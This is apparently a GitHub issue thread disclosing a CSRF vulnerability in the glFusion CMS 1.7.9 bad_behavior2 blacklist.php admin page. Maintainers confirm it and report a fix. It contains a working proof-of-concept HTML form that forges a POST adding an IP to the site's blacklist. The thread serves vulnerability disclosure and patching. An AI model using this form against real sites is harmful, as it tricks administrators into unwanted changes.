glFusion CMS 1.7.9 blacklist.php CSRF vulnerability

[Topsec-bunney]

Attackers can construct blacklist IP addresses. Using the CSRF vulnerability to trick the administrator to click, can add a blacklist

poc

  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.255.130/glfusion-1.7.9/public_html/admin/plugins/bad_behavior2/blacklist.php" method="POST">
      <input type="hidden" name="mode" value="addsave" />
      <input type="hidden" name="bl&#95;type" value="spambot&#95;ip" />
      <input type="hidden" name="bl&#95;item" value="1&#46;1&#46;1&#46;121" />
      <input type="hidden" name="ban&#95;reason" value="ipbrute" />
      <input type="hidden" name="submit" value="Submit" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

[leegarner]

I can duplicate this, we should just need to add the CSRF token to the blacklist (and other) process. Thanks.

On Wed, Dec 8, 2021 at 11:11 PM Topsec_bunney @.***> wrote:

Attackers can construct blacklist IP addresses. Using the CSRF vulnerability to trick the administrator to click, can add a blacklist

poc `

`   — You are receiving this because you are subscribed to this thread. Reply to this email directly, view it on GitHub , or unsubscribe . Triage notifications on the go with GitHub Mobile for iOS or Android .

[mark0263]

Adding CSRF support for blacklist entry / edit.

[mark0263]

Fixed with b380eada6647b2cccd94ab24aa744521b4d588af